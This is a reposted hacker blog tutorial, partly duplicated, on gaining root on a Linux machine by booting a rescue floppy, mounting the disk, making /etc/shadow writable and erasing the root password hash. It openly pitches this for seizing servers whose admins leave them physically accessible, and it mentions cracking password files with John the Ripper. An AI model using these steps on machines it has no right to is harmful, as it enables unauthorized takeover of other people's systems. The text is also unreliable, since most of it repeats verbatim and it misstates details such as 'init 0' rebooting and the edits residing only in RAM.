Rooting Linux with a floppy
You have lost your root password on your linux box and now you consider formatting
everythign to regain control? Your admin is a moron that leaves the server available
physically for everybody? You wanna test your Linux box? Don’t worry if you have at least
a floppy rescue disk under hand,you can root it ;-) )
The problem with the new version of Linux since 6.2 is :
a)the shadow suit that is installed by default (masking the password in the shadow file)
b)the md5 encryption ( 34 characters vs 13 for standard DES) so it’s not as easy as it was
in teh previous versions i.e. to simply get the /etc/passwd file and running JtR against it
doesn’t work anymore.
What to do now? Follow the guide :
1- Boot with a rescue disk
2- type the appropriate key to get into rescue mode (ex.F4)
3- linux rescue (to get into this mode)
4- $ mknod /dev/hda (to create a virtual HD)
* * * N o t e * * *
If you have more than one partition on your HD, check which one is the Linux partition:
A- $ fdisk /dev/hda
B-( fdisk) : p (to show the current partitions) : m (for commands)
5- $ mknod /dev/hda2 ( create the partition2 device if you have a DOS partition as primary
partition for example)
6- $ mkdir /data (to create a virtual directory in the RAM drive)
7- $ mount -t ext2 /dev/hda2 /data ( to mount the files in the virtual dir located in the
RAM drive)
8-$ cd /data/etc
9- $ chmod 700 /data/etc/shadow
or $ chmod u+w /data/etc/shadow ( to gain write access on the shadow file)
10-$ /data/bin/vi /data/etc/shadow (to edit the shadow file with VI editor)
11- type i to insert then remove the root password by positionning the cursor on the
characters and type the x key
12- type escape key then ” : ”
13- save the file with : wq!
At this point, everything you have done is in RAM and nothing is done on the HD so DON’T
REBOOT YET!!
14- $ cd / (to return back to /)
15- $ umount /data
16- $ init 0 (rebooting the system)
Now you can log in as root; there is no password protecting root anymore.
Take care everyone, Just1ce.
reference:http://www.exploitx.com/69/rooting-linux-with-a-floppy/
everythign to regain control? Your admin is a moron that leaves the server available
physically for everybody? You wanna test your Linux box? Don’t worry if you have at least
a floppy rescue disk under hand,you can root it ;-) )
The problem with the new version of Linux since 6.2 is :
a)the shadow suit that is installed by default (masking the password in the shadow file)
b)the md5 encryption ( 34 characters vs 13 for standard DES) so it’s not as easy as it was
in teh previous versions i.e. to simply get the /etc/passwd file and running JtR against it
doesn’t work anymore.
What to do now? Follow the guide :
1- Boot with a rescue disk
2- type the appropriate key to get into rescue mode (ex.F4)
3- linux rescue (to get into this mode)
4- $ mknod /dev/hda (to create a virtual HD)
* * * N o t e * * *
If you have more than one partition on your HD, check which one is the Linux partition:
A- $ fdisk /dev/hda
B-( fdisk) : p (to show the current partitions) : m (for commands)
5- $ mknod /dev/hda2 ( create the partition2 device if you have a DOS partition as primary
partition for example)
6- $ mkdir /data (to create a virtual directory in the RAM drive)
7- $ mount -t ext2 /dev/hda2 /data ( to mount the files in the virtual dir located in the
RAM drive)
8-$ cd /data/etc
9- $ chmod 700 /data/etc/shadow
or $ chmod u+w /data/etc/shadow ( to gain write access on the shadow file)
10-$ /data/bin/vi /data/etc/shadow (to edit the shadow file with VI editor)
11- type i to insert then remove the root password by positionning the cursor on the
characters and type the x key
12- type escape key then ” : ”
13- save the file with : wq!
At this point, everything you have done is in RAM and nothing is done on the HD so DON’T
REBOOT YET!!
14- $ cd / (to return back to /)
15- $ umount /data
16- $ init 0 (rebooting the system)
Now you can log in as root; there is no password protecting root anymore.
Take care everyone, Just1ce.
reference:http://www.exploitx.com/69/rooting-linux-with-a-floppy/
0 komentar: